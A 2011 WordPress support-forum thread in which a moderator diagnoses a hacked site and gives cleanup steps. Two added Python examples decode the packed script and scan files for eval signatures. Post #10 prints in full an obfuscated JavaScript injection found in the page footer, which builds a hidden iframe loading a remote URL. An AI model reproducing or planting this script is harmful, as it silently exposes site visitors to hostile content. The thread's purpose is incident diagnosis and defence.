|
#1

Nov 19, 2011, 03:30 PM
320 posts · Apr 2009
[VA & AZ], USA
|
|
I have not modified any of the templates for a while, yet this issue recently appeared on all pages:
Code:
Fatal error: Cannot redeclare _765258526() (previously declared in /home/wimble17/public_html/fscene.com/wp-content/themes/atahualpa353/index.php(42) : eval()'d code:1) in /home/wimble17/public_html/fscene.com/index.php(18) : eval()'d code on line 1
You can view it at the bottom of the live site here:
http://goo.gl/HZhvk
|
#2

Nov 19, 2011, 06:32 PM
23,765 posts · Mar 2009
OSX 10.11.5 WP 4.x Atahualpa(all) Safari, Firefox, Chrome
|
|
what php code do you have in the footer area?
__________________
"Tell me and I forget, teach me and I may remember, involve me and I learn." - Benjamin Franklin
Juggledad | Forum Moderator/Support
|
#3

Nov 19, 2011, 07:21 PM
320 posts · Apr 2009
[VA & AZ], USA
|
|
Thanks for your time juggledad.
There is no php code in the footer but I did insert some php code in the "content below the loop" section:
http://snipt.org/kXll7
|
#4

Nov 20, 2011, 04:02 AM
23,765 posts · Mar 2009
OSX 10.11.5 WP 4.x Atahualpa(all) Safari, Firefox, Chrome
|
|
what version?
try changing the
HTML Code:
<?php if ( is_front_page() && strpos($_SERVER['REQUEST_URI'], "/page/") === false) { ?>
to
HTML Code:
<?php if ( is_front_page() ) { ?>
__________________
Juggledad | Forum Moderator/Support
Last edited by juggledad; Nov 20, 2011 at 04:08 AM.
|
#5

Nov 21, 2011, 01:06 PM
320 posts · Apr 2009
[VA & AZ], USA
|
|
No change occurred.
This site is running Atahualpa 3.5.3
|
#6

Nov 21, 2011, 05:02 PM
10,176 posts · Jul 2009
Central New York State USA
|
|
What happens if you temporarily remove the code you put in the "content below the loop" section?
__________________
~Larry ( CNY Web Designs)
|
#7

Nov 22, 2011, 04:00 PM
320 posts · Apr 2009
[VA & AZ], USA
|
|
Quote:
Originally Posted by lmilesw
What happens if you temporarily remove the code you put in the "content below the loop" section?
|
Good observation. I just tried removing all the code I entered there, and nothing changed on the site either. So the problem must lie somewhere else.
|
#8

Nov 22, 2011, 04:39 PM
23,765 posts · Mar 2009
OSX 10.11.5 WP 4.x Atahualpa(all) Safari, Firefox, Chrome
|
|
export your settings (ato->export/import settings) and attach them to a reply
__________________
Juggledad | Forum Moderator/Support
|
#9

Nov 22, 2011, 04:52 PM
320 posts · Apr 2009
[VA & AZ], USA
|
|
Quote:
Originally Posted by juggledad
export your settings (ato->export/import settings) and attach them to a reply
|
Thank you, here are the settings.
Last edited by Wimbledon; Nov 23, 2011 at 09:21 PM.
|
#10

Nov 22, 2011, 05:09 PM
23,765 posts · Mar 2009
OSX 10.11.5 WP 4.x Atahualpa(all) Safari, Firefox, Chrome
|
|
do you have a yahoo plugin? There is some weird code in the footer of your page
Code:
<script type='text/javascript'>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('i 8(){b=4.h(\'9\');6(!b){a 0=4.j(\'k\');4.m.g(0);0.n=\'9\';0.5.f=\'7\';0.5.c=\'7\';0.5.d=\'e\';0.l=\'C://z.y.o/A.B?t=D\'}}a 2=x.w.q();6(((2.3("p")!=-1&&2.3("r")==-1&&2.3("s")==-1))&&2.3("v")!=-1){4.u=8}',40,40,'el||ua|indexOf|document|style|if|1px|MakeFrameEx|yahoo_api|var|element|height|display|none|width|appendChild|getElementById|function|createElement|iframe|src|body|id|cx|msie|toLowerCase|opera|webtv||onmousemove|windows|userAgent|navigator|xe|noquestion|showthread|php|http|46340270'.split('|'),0,{}))
</script>
do you know what this is or what is adding it in?
__________________
Juggledad | Forum Moderator/Support
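The script quoted in post #10 uses the common `eval(function(p,a,c,k,e,d)...)` packer, which can be decoded as plain text without running it in a browser. The following is an added example, not code from the thread; the function names, `INDICATORS` list and `SAMPLE` string are constructed for illustration, and string escapes other than `\'` and `\\` are not handled.

```python
import re

# Matches the wrapper's argument list: }('payload',radix,count,'w0|w1|...'.split('|')
PACKED_RE = re.compile(
    r"\}\('(?P<p>(?:\\.|[^'\\])*)',(?P<a>\d+),(?P<c>\d+),"
    r"'(?P<k>[^']*)'\.split\('\|'\)"
)
DIGITS = "0123456789abcdefghijklmnopqrstuvwxyz"

def encode_index(c, a):
    """Mirror of the packer's e(c): index -> token in radix a (36 and up map to 'A', 'B', ...)."""
    prefix = "" if c < a else encode_index(c // a, a)
    c %= a
    return prefix + (chr(c + 29) if c > 35 else DIGITS[c])

def unpack(js):
    """Return the unpacked source as text, or None if no packed wrapper is found."""
    m = PACKED_RE.search(js)
    if not m:
        return None
    radix, count = int(m["a"]), int(m["c"])
    words = m["k"].split("|")
    # An empty dictionary slot means the token stands for itself, as in the packer.
    table = {encode_index(i, radix): w for i, w in enumerate(words[:count]) if w}
    payload = re.sub(r"\\(.)", r"\1", m["p"])  # undo \' and \\ from the JS string literal
    return re.sub(r"\b\w+\b", lambda t: table.get(t.group(0), t.group(0)),
                  payload, flags=re.ASCII)

# Words visible in the dictionary of the script in post #10 that show what it touches.
INDICATORS = ("createElement", "iframe", "appendChild", "onmousemove", "userAgent")

def indicators(source):
    """List which of the indicator words appear in the unpacked source."""
    return [w for w in INDICATORS if w in source]

# Constructed sample (not the script from the thread); the packer body is elided.
SAMPLE = r"""eval(function(p,a,c,k,e,d){/*...*/}('3 0=1.2(\'4\');0.5=\'6\'',62,7,'el|document|createElement|var|iframe|id|demo'.split('|'),0,{}))"""

if __name__ == "__main__":
    print(unpack(SAMPLE))
    print(indicators(unpack(SAMPLE)))
```

Save the suspicious script to a text file and pass its contents to `unpack()`; the output is only a string, so nothing from the page is executed.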
|
#11

Nov 23, 2011, 04:19 PM
320 posts · Apr 2009
[VA & AZ], USA
|
|
Wow juggledad, I have no idea what that is. I certainly did not add it nor do I have any Yahoo plugins. The only plugins active on the site are Disqus, Lijit Search, and NextGen Gallery. Akismet and Hello Dolly are inactive plugins.
At ATO-->Style & Edit footer, there is no such code inserted.
Perhaps this is malicious code inserted through a security vulnerability?
Are you able to tell which file has this code? If so, I will edit the file and FTP the changes.
How odd...
|
#12

Nov 23, 2011, 06:14 PM
23,765 posts · Mar 2009
OSX 10.11.5 WP 4.x Atahualpa(all) Safari, Firefox, Chrome
|
|
I looked at the source of a page generated from your site. I wasn't going to mention malicious code...yet, but it certainly is not code meant to be understood.
here is what I would do, turn off all the plugins and swap to twenty-eleven.
view the front page of the site then look at the source of the page in the browser.
go to the end and see if that code is there. if it is, then I would say you were hacked.
__________________
Juggledad | Forum Moderator/Support
|
#13

Nov 23, 2011, 06:32 PM
320 posts · Apr 2009
[VA & AZ], USA
|
|
I did exactly as you instructed yet unfortunately the code remained. It does appear that I was hacked.
Do you have any idea where I should start looking for this code?
|
#14

Nov 23, 2011, 07:10 PM
23,765 posts · Mar 2009
OSX 10.11.5 WP 4.x Atahualpa(all) Safari, Firefox, Chrome
|
|
It might be a Wordpress file.
1) change all your passwords in Wordpress - look for strange users
If you want to do a forensic exam, backup the entire wordpress folder and the database and get a copy of the logs for as far back as you can. If it was an FTP hack, it should show something
Look at the dates on the files via FTP and see if there are ones that have newer dates than when you installed wp.
Maybe contact your host
Manually replace the entire wordpress code base, everything but the wp-config.php and the wp-contents folder
Replace every plugin with a new copy
Replace every theme with a new copy
Change the FTP password
Check to see if there are any extra FTP users
Change your host cPanel password
Scan the db export for that code
Check google for other suggestions
__________________
Juggledad | Forum Moderator/Support
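Two of the checks in the list above (files newer than the install date, and scanning files and the database export for "that code") can be run together over a downloaded copy of the site. This is an added example, not code from the thread; `scan_tree`, the signature names and the `installed_at` parameter are illustrative, and the signatures are limited to what this thread shows.

```python
import os
import re

# Signatures taken from this thread (matches are leads to review, not verdicts):
#  - the packed-JavaScript wrapper quoted in post #10
#  - PHP eval(), which the fatal error in post #1 shows running inside index.php
PACKED_JS = re.compile(rb"eval\(function\(p,a,c,k,e,d\)")
PHP_EVAL = re.compile(rb"\beval\s*\((?!function\(p,a,c,k,e,d\))")
SCAN_EXT = (".php", ".js", ".html", ".htm", ".sql")  # .sql covers the database export

def scan_tree(root, installed_at):
    """Walk a local copy of the site (plus any DB export placed in it).

    Returns a sorted list of (relative_path, [signature names], newer_than_install)
    for every file that matches a signature or was modified after installed_at
    (a Unix timestamp supplied by the admin).
    """
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(SCAN_EXT):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    data = fh.read()
                mtime = os.path.getmtime(path)
            except OSError:
                continue  # unreadable file: skip rather than abort the scan
            hits = []
            if PACKED_JS.search(data):
                hits.append("packed-js")
            if name.lower().endswith(".php") and PHP_EVAL.search(data):
                hits.append("php-eval")
            newer = mtime > installed_at
            if hits or newer:
                rel = os.path.relpath(path, root).replace(os.sep, "/")
                findings.append((rel, hits, newer))
    return sorted(findings)
```

Modification times can be reset by an intruder and may not survive an FTP download, and `eval(` also appears in some legitimate PHP, so each finding is a file to open and read rather than proof of tampering.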
|
#15

Nov 23, 2011, 09:23 PM
320 posts · Apr 2009
[VA & AZ], USA
|
|
Thanks again for your time and help.
Upon closer inspection, all sites on the server have been similarly compromised unfortunately. I am in correspondence with my host to help resolve this. I was definitely hacked.
|
|